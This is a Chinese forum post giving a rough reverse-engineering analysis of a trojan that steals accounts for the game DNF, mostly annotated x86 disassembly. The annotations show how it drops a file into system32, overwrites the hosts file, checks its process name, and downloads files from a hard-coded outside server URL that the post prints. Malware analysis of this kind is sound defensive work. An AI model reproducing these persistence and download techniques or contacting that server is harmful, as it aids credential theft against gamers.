首页
社区
课程
招聘
[原创]某游戏盗号木马粗略分析
发表于: 2016-11-12 15:19 5619

[原创]某游戏盗号木马粗略分析

2016-11-12 15:19
5619
        
00558333     E9 22F3EFFF     jmp c1.0045765A;单步下面也一样
0045765A     E8 21640000    call c1.0045DA80
0045765F     E9 79FEFFFF     jmp c1.004574DD
004574DD    6A 58                 push 0x58
004574DF    68 30E14800     push c1.0048E130
004574E4    E8 D3450000     call c1.0045BABC
004108B0    55              push ebp
004108B1    8BEC            mov ebp,esp
004108B3    83E4 F8         and esp,0xFFFFFFF8
004108B6    6A FF           push -0x1
004108B8    68 BD4C4700     push dump1.00474CBD
004108BD    64:A1 00000000  mov eax,dword ptr fs:[0]
004108C3    50              push eax
004108C4    51              push ecx
004108C5    B8 80280000     mov eax,0x2880
004108CA    E8 31B80400     call dump1.0045C100
004108CF    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
004108D4    33C4            xor eax,esp
004108D6    898424 7C280000 mov dword ptr ss:[esp+0x287C],eax
004108DD    56              push esi
004108DE    57              push edi
004108DF    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
004108E4    33C4            xor eax,esp
004108E6    50              push eax
004108E7    8D8424 90280000 lea eax,dword ptr ss:[esp+0x2890]
004108EE    64:A3 00000000  mov dword ptr fs:[0],eax
004108F4    8D4424 0C       lea eax,dword ptr ss:[esp+0xC]
004108F8    50              push eax
004108F9    8BF9            mov edi,ecx
004108FB    C74424 10 08000>mov dword ptr ss:[esp+0x10],0x8
00410903    C74424 14 FF000>mov dword ptr ss:[esp+0x14],0xFF
0041090B    FF15 28604700   call dword ptr ds:[<&comctl32.InitCommonControls>; comctl32.InitCommonControlsEx
00410911    8BCF            mov ecx,edi
00410913    E8 76450300     call dump1.00444E8E
00410918    6A 00           push 0x0
0041091A    E8 FC550300     call dump1.00445F1B
0041091F    83C4 04         add esp,0x4
00410922    68 28E34700     push dump1.0047E328 ; UNICODE "DNF"
00410927    8BCF            mov ecx,edi
00410929    E8 C05A0300     call dump1.004463EE
0041092E    E8 4DCFFFFF     call dump1.0040D880; 释放文件(函数内部流程见下文)
代码 :
0040D880    55              push ebp
0040D881    8BEC            mov ebp,esp
0040D883    81EC 60020000   sub esp,0x260
0040D889    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
0040D88E    33C5            xor eax,ebp
0040D890    8945 FC         mov dword ptr ss:[ebp-0x4],eax
0040D893    53              push ebx
0040D894    56              push esi
0040D895    57              push edi
0040D896    8B3D F0624700   mov edi,dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA
0040D89C    68 2C010000     push 0x12C
0040D8A1    8D85 D0FEFFFF   lea eax,dword ptr ss:[ebp-0x130]
0040D8A7    50              push eax
0040D8A8    FFD7            call ed; 获取系统目录
0040D8AA    8B1D 38634700   mov ebx,dword ptr ds[<&kernel32.lstrcat>];kernel32.lstrcatA
0040D8B0    68 28DF4700     push dump1.0047DF28 ; ASCII "\dnfset.cyc"
0040D8B5    8D8D D0FEFFFF   lea ecx,dword ptr ss:[ebp-0x130]
0040D8BB    51              push ecx
0040D8BC    FFD3            call ebx
0040D8BE    6A 00           push 0x0
0040D8C0    6A 00           push 0x0
0040D8C2    6A 04           push 0x4
0040D8C4    6A 00           push 0x0
0040D8C6    6A 01           push 0x1
0040D8C8    68 00000080     push 0x80000000
0040D8CD    8D95 D0FEFFFF   lea edx,dword ptr ss:[ebp-0x130]
0040D8D3    52              push edx
0040D8D4    FF15 EC624700   call dword ptr ds:[<&kernel32.CreateFileA>]; 释放dnfset.cyc到system32目录
0040D8DA    6A 00           push 0x0
0040D8DC    6A 00           push 0x0
0040D8DE    8BF0            mov esi,eax
0040D8E0    6A 00           push 0x0
0040D8E2    56              push esi
0040D8E3    FF15 E8624700   call dword ptr ds:[<&kernel32.SetFilePointer>]; kernel32.SetFilePointer
0040D8E9    6A 00           push 0x0
0040D8EB    8D85 A0FDFFFF   lea eax,dword ptr ss:[ebp-0x260]
0040D8F1    50              push eax
0040D8F2    68 6C020000     push 0x26C
0040D8F7    68 28FA4900     push dump1.0049FA28 ; ASCII "http://183.60.203.82:5566/f/w11/get.asp"
0040D8FC    56              push esi
0040D8FD    FF15 E4624700   call dword ptr ds:[<&kernel32.ReadFile>]; 从http://183.60.203.82:5566/f/w11/get.asp 读取信息
0040D903    56              push esi
0040D904    8B35 20634700   mov esi,dword ptr ds:[<&kernel32.CloseHandle>]; kernel32.CloseHandle
0040D90A    FFD6            call esi
0040D90C    E8 2FFFFFFF     call dump1.0040D840
0040D911    68 2C010000     push 0x12C
0040D916    8D8D A4FDFFFF   lea ecx,dword ptr ss:[ebp-0x25C]
0040D91C    51              push ecx
0040D91D    FFD7            call edi
0040D91F    68 34DF4700     push dump1.0047DF34 ; ASCII "\drivers\etc\hosts"
0040D924    8D95 A4FDFFFF   lea edx,dword ptr ss:[ebp-0x25C]
0040D92A    52              push edx
0040D92B    FFD3            call ebx
0040D92D    6A 00           push 0x0
0040D92F    6A 00           push 0x0
0040D931    6A 02           push 0x2
0040D933    6A 00           push 0x0
0040D935    6A 01           push 0x1
0040D937    68 00000040     push 0x40000000
0040D93C    8D85 A4FDFFFF   lea eax,dword ptr ss:[ebp-0x25C]
0040D942    50              push eax
0040D943    FF15 EC624700   call dword ptr ds:[<&kernel32.CreateFileA>]; 创建文件hosts于C:\WINDOWS\system32\drivers\etc目录
0040D949    50              push eax
0040D94A    FFD6            call esi
0040D94C    8B4D FC         mov ecx,dword ptr ss:[ebp-0x4]
0040D94F    5F              pop edi
0040D950    5E              pop esi
0040D951    33CD            xor ecx,ebp
0040D953    5B              pop ebx
0040D954    E8 0B9D0400     call dump1.00457664
0040D959    8BE5            mov esp,ebp
0040D95B    5D              pop ebp
0040D95C    C3              retn
00410933    8B35 D4624700   mov esi,dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA
00410939    68 2C010000     push 0x12C
0041093E    8D8C24 18220000 lea ecx,dword ptr ss:[esp+0x2218]
00410945    51              push ecx
00410946    6A 00           push 0x0
00410948    FFD6            call esi
0041094A    8D9424 14220000 lea edx,dword ptr ss:[esp+0x2214]
00410951    68 30E34700     push dump1.0047E330 ; ASCII "sockhelp"
00410956    52              push edx
00410957    E8 E4800400     call dump1.00458A40  ; 判断进程名是不是sockhelp32.exe?
0041095C    83C4 08         add esp,0x8
0041095F    85C0            test eax,eax
00410961    74 3A           je short dump1.0041099D ; 如果是则不跳
00410963    8B35 DC624700   mov esi,dword ptr ds:[<&kernel32.CreateThread>]  ; kernel32.CreateThread
00410969    6A 00           push 0x0
0041096B    6A 00           push 0x0
0041096D    6A 00           push 0x0
0041096F    68 B0E54000     push dump1.0040E5B0
00410974    6A 00           push 0x0
00410976    6A 00           push 0x0
00410978    FFD6            call esi 创建一个线程,地址40e5b0.获取主机地址
0041097A    E8 71D6FFFF     call dump1.0040DFF0 从网上下载文件(函数内部见下文)

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//